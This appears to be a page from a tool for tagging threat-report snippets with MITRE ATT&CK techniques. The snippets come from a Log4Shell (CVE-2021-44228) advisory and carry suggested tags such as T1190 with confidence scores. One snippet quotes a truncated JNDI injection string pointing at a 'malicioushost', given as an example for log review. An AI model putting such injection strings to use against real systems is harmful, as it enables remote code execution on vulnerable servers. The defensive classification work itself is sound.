"##ndiexploit. the use of this tool by a threat actor can provide worthwhile discovery and analysis from defenders in reviewing logs — the executed commands are typically included within the url as base64 encoded text. these look like queries: ${jndi:ldap://malicioushost.…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
T1190 Exploit Public-Facing Application
54%
"'s happening? attackers are actively exploiting a critical vulnerability that affects a java logging package. log4j is used in a variety of different popular software by a number of manufacturers, including apple, twitter and steam. because of its large attack surface and the in…"
T1190 Exploit Public-Facing Application
34%
"-report.html#a2.16.0 update #4 - 12/13/2021 @ 5:40pm et join us on tuesday, december 14 at 1pm et for tradecraft tuesday. we'll team up with our industry friend and co-creator of our log4shell vulnerability tool, jason slagle, to talk about this vulnerability and…"
T1190 Exploit Public-Facing Application
34%
"##pm et - updated with an invitation to join our technical deep-dive during this week's tradecraft tuesday episode - update #3 - 12/11/2021 @ 11:30am et - updated with instructions on how to use our vulnerability tool - update #2 - 12/11/2021 @ 1am et - updated to…"
T1190 Exploit Public-Facing Application
32%
"upgrade to log4j 2.17.1 immediately. you should also be sure that your java instance is up-to-date. a patch for cve-2021-44228 has been released, but unfortunately, we’re at the mercy of many of our vendors to push updates that completely patch the vulnerability. how …"
T1204.002 Malicious File
31%
"##point, which serves java code to be executed on the original victim. ultimately, this grants the adversary the opportunity to run any code they would like on the target: remote code execution. huntress researcher john hammond has recreated a proof-of-concept exploit agains…"
Summary
Our team is currently investigating CVE-2021-44228, a critical vulnerability that’s affecting a Java logging package.